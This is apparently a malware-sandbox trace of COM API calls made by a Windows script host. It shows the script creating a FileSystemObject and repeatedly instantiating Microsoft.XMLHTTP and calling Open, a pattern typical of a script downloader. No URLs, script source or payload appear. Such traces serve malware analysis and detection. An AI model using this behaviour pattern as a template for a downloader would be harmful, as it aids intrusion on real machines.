	[0324.842] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0324.842] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0324.842] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0324.842] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0324.842] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0324.842] ??2@YAPEAX_K@Z () returned 0x62f350
	[0324.842] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0324.842] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0324.842] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0324.843] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0324.843] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0324.843] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0324.843] SysStringLen (param_1=0x0) returned 0x0
	[0324.843] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0324.845] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0324.845] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0324.845] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0324.845] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0324.845] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0324.846] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0325.770] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0325.770] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74e0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0325.770] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0325.771] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0325.771] SysStringLen (param_1=0x0) returned 0x0
	[0325.771] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0325.772] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0325.772] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74e0) returned 0x0
	[0325.772] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0325.772] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c72f8) returned 0x0
	[0325.772] ??2@YAPEAX_K@Z () returned 0x62f330
	[0325.772] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c72f8, pUnkSite=0x62f330) 
	[0325.772] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0325.772] XMLHTTPRequest:IUnknown:Release (This=0x49c72f8) returned 0x0
	[0325.772] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74e0) returned 0x0
	[0325.772] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74e0) returned 0x3
	[0325.772] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0325.772] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74e0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0325.775] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0325.775] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0325.775] SysStringLen (param_1=0x0) returned 0x0
	[0325.775] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0325.775] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0325.776] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7230) returned 0x0
	[0325.776] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0325.776] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7230, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7298) returned 0x0
	[0325.776] ??2@YAPEAX_K@Z () returned 0x62f310
	[0325.776] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7298, pUnkSite=0x62f310) 
	[0325.776] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0325.776] XMLHTTPRequest:IUnknown:Release (This=0x49c7298) returned 0x0
	[0325.776] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7230, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7230) returned 0x0
	[0325.776] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7230) returned 0x3
	[0325.776] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7230, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0325.776] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7230, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0325.776] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7230, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0325.777] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0325.777] SysStringLen (param_1=0x0) returned 0x0
	[0325.777] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0325.777] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0325.777] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0325.777] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0325.777] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0325.777] ??2@YAPEAX_K@Z () returned 0x62f330
	[0325.777] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f330) 
	[0325.777] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0325.777] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0325.777] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0325.777] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0325.778] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0325.778] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0325.778] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0325.778] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0325.778] SysStringLen (param_1=0x0) returned 0x0
	[0325.778] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0325.778] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0325.778] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5bf0) returned 0x0
	[0325.778] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0325.778] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bf0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74f8) returned 0x0
	[0325.779] ??2@YAPEAX_K@Z () returned 0x62f310
	[0325.779] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74f8, pUnkSite=0x62f310) 
	[0325.779] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0325.779] XMLHTTPRequest:IUnknown:Release (This=0x49c74f8) returned 0x0
	[0325.779] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bf0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5bf0) returned 0x0
	[0325.779] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5bf0) returned 0x3
	[0325.779] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bf0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0325.779] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5bf0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0325.779] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bf0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0325.779] longjmp () 
	[0325.779] longjmp () 
	[0325.780] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0325.780] SysStringLen (param_1=0x0) returned 0x0
	[0325.780] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0325.780] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0325.780] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0325.780] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0325.780] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7208) returned 0x0
	[0325.780] ??2@YAPEAX_K@Z () returned 0x62f330
	[0325.780] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7208, pUnkSite=0x62f330) 
	[0325.780] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0325.780] XMLHTTPRequest:IUnknown:Release (This=0x49c7208) returned 0x0
	[0325.780] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0325.780] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0325.781] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
